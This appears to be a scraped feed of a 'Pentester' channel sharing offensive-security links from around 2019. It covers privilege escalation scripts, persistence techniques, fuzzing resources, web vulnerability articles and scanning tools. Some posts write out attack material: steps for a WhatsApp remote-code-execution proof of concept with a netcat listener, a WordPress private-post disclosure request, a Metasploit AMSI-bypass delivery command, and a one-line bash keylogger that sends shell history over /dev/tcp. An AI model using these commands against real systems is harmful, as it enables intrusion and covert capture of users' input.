Pentester

The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, ...

70 views03:41

Pentester

Privesc - Windows batch script that finds misconfiguration issues which can lead to privilege escalation https://t.co/TQacBYeylG

GitHub

GitHub - enjoiz/Privesc: Windows batch script that finds misconfiguration issues which can lead to privilege escalation.

Windows batch script that finds misconfiguration issues which can lead to privilege escalation. - enjoiz/Privesc

69 views04:10

Pentester

https://googleprojectzero.blogspot.com/2019/10/ktrw-journey-to-build-debuggable-iphone.html?m=1

Blogspot

KTRW: The journey to build a debuggable iPhone

Posted by Brandon Azad, Project Zero In my role here at Project Zero, I do not use some of the tooling used by some external iOS securit...

78 views04:12

Pentester

[PoC] CVE-2019-11932 Whatsapp 2.19.216 Remote Code Execution

1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user

https://t.co/dpeiJOpg4m
https://t.co/lXWWAcq8Y4

GitHub

GitHub - dorkerdevil/CVE-2019-11932: double-free bug in WhatsApp exploit poc

double-free bug in WhatsApp exploit poc. Contribute to dorkerdevil/CVE-2019-11932 development by creating an account on GitHub.

87 views04:14

Pentester

97 views05:23

Pentester

WhatsApp Forensics.pdf

3.4 MB

214 views05:23

Pentester

A curated list of fuzzing resources ( Books, courses - free & paid, videos, tools, tutorials & vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.

https://t.co/5zu0MtfDPT

GitHub

secfigo/Awesome-Fuzzing

A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Develo...

97 views03:15

Pentester

https://medium.com/@libyaazy/ssrf-server-side-request-forgery-10028135537c

Medium

SSRF — Server Side Request Forgery

First things first

94 views05:22

Pentester

https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/

88 views05:23

Pentester

Collect all URL's, sub-domains, emails, phone numbers and fuzz all parameters for XSS/SQLi/RCE/Traversal flaws with BlackWidow https://t.co/K9EOzIpaxm https://t.co/jJzZhsfoWn

GitHub

GitHub - 1N3/BlackWidow: A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target…

A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website. - GitHub - 1N3/BlackWidow: A Python based web application scanner to gather OSINT and ...

103 views05:25

Pentester

WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts

POC: GET /wordpress/?static=1&order=asc

Fix: Remove the static query property
https://t.co/dg5TSxIyKs

Analsyis: https://t.co/Wc5QY2Ui9s

GitHub

Query: Remove the static query property. · WordPress/WordPress@f82ed75

Prevent unauthenticated views of publicly queryables content types.

Props aaroncampbell, whyisjake, nickdaugherty, xknown.

Built from https://develop.svn.wordpress.org/branches/5.2@46479

git-sv...

93 views05:49

Pentester

One command to rule them all!

Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.

Testing and feedbacks are welcome!

https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB

Test it with:

msfconsole -r web.rc

GitHub

Add support for AMSI/SBL bypass to PSH web_delivery by phra · Pull Request #12446 · rapid7/metasploit-framework

94 views05:00

Pentester

https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html

www.a12d404.net

Persistence using Task Scheduler without a Scheduled Task

Task Scheduler service loads a non-existing DLL enabling persistence as `NT AUTHORITY\SYSTEM`.

97 views12:57

Pentester

I had fun with this one line bash keylogger today!

PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'

87 views07:11

Pentester

Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin

https://t.co/C7XachfASf

root@Hausec

Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin

In the previous two articles, I gathered local user credentials and escalated to local administrator, with my next step is getting to domain admin. Since I have local admin, I’ll be using a t…

98 views07:54

Pentester

https://research.securitum.com/jwt-json-web-token-security/

Securitum

Securitum - Security penetration testing.

Securitum is a pure pentesting company specialising in the security of IT systems. We have experience in performing security audits (including penetration tests) - mainly for
financial/e-commerce/industrial sectors. We have performed penetration tests and…

88 views08:30

Pentester

82 views07:19

Pentester

https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21

Medium

RouterOS: Chain to Root

DNS Request to a Root Busybox Shell

66 views03:54

Pentester

https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/

Penetration Testing Lab

Persistence – Scheduled Tasks

Windows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been hea…

67 viewsedited 04:35

Pentester

https://lab.wallarm.com/race-condition-in-web-applications/amp/?__twitter_impression=true

Wallarm

Race Condition in Web Applications

Even web application APIs can be subject to race conditions. Check out where it can happen such as the cases of HTTP pipelining, splitting HTTP and others.

78 views04:37

Pentester

Burp Suite Pro 2.1.05 released, with experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new approach will provide a robust basis for future capabilities. Feedback welcome if you want to play now.
https://t.co/UPYjGMibnE

releases.portswigger.net

Professional 2.1.05

This release adds experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new appr...

83 views12:57

About

Blog

Apps

Platform